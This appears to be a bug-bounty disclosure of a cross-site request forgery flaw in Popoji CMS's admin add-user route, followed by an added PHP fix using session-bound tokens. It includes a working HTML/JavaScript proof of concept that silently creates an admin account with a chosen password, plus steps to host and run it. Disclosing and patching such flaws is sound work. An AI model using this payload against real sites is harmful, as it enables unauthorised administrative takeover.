Description:
This happens because the request that adds an admin user (route.php?mod=user&act=addnew) carries no CSRF token, so the server cannot tell whether the logged-in admin intended the request or a third-party page issued it.
Steps to Reproduce:
```html
<script>
function getMe() {
    // retrieve page content
    var xhr = new XMLHttpRequest();
    // now execute the CSRF attack
    xhr.open("POST", "http://root/popoji/poadmin/route.php?mod=user&act=addnew", true);
    xhr.withCredentials = true;
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashandy21%40gmail.com&no_telp=083833232954&level=1');
}
</script>
<button onclick="getMe()">Let's Rock</button>
```
1. Save the code to an .html file.
2. Upload it to a host.
3. Execute it.
Video:
https://www.youtube.com/watch?v=1FXXuSiB6jo
Fix & Mitigation:
Include a CSRF token in every request that performs a sensitive action (such as adding an admin user), and have the server reject any request whose token is missing or does not match the one issued to the session.
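The following is an added illustration of that fix and is not Popoji's own code. It assumes PHP sessions are in use; the function names (csrf_token, csrf_check), the hidden field name csrf_token and the form fields shown are assumptions for the example. The token is generated once per session, embedded in the form, and compared server-side with a constant-time check before any state changes.

```php
<?php
// Added example (not Popoji's own code): session-bound CSRF token for a
// sensitive action such as adding a user. Function and field names are
// assumptions chosen for illustration.
session_start();

// Create the token once per session and reuse it for every form in that session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison so the check does not leak the token byte by byte.
function csrf_check(?string $submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject the request before touching any state if the token is absent or wrong.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Only now run the add-user logic (hypothetical add_user() call goes here).
}
?>
<form method="post" action="route.php?mod=user&amp;act=addnew">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    <input type="text" name="username">
    <input type="password" name="password">
    <input type="password" name="repeatpass">
    <button type="submit">Add user</button>
</form>
```

A cross-site page cannot read the victim's session to learn the token, so a forged POST like the one in the proof of concept arrives without a valid csrf_token and is refused with 403 before the user is created. Setting the session cookie with the SameSite attribute is a useful second layer, but the token check is the control that closes this issue.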
Note:
They gave me permission to disclose it, and they say the patch will be deployed in the next version. So, if you use Popoji CMS, be careful, don't trust any link from unknown people and keep your CMS updated. And also they gave me a bounty for this! Yeey!